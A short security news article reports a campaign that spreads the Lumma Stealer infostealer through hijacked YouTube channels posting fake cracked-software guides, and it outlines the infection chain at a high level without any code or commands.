Threat actors are using YouTube channels as a platform to distribute a variant of the Lumma Stealer malware. The attackers are using deceptive videos with content related to cracked software to lure unsuspecting users into downloading malicious content.
These YouTube videos offer users installation guides incorporating malicious URLs often shortened using services like TinyURL and Cuttly. To circumvent straightforward web filter blacklists, the threat actors exploit open-source platforms like GitHub and MediaFire instead of deploying their malicious servers.
The Lumma Stealer is a malware strain known for its ability to pilfer sensitive information, including user credentials, system details, browser data, and extensions. Written in the C programming language, this malware has been advertised for sale on the dark web since 2022, with numerous command-and-control (C2) servers observed in the wild, along with regular updates to enhance its capabilities.
To avoid detection and analysis, the threat actors behind Lumma Stealer employ various obfuscation techniques.
The attack method, as detailed by FortiGuard Labs, involves compromising a YouTuber's account and uploading videos disguised as guides for installing cracked software.
The most recent attacks, observed by the researchers, attempted to trick the user into clicking on links in the video descriptions. These links led to the download of a deceptive installer hosted on MediaFire.
Upon unpacking the installer, a Windows shortcut (LNK) posing as a setup file is run. This LNK file fetches a .NET loader from a GitHub repository, which, in turn, loads the Lumma Stealer payload after performing anti-virtual machine and anti-debugging checks, ensuring the malware can operate undetected.
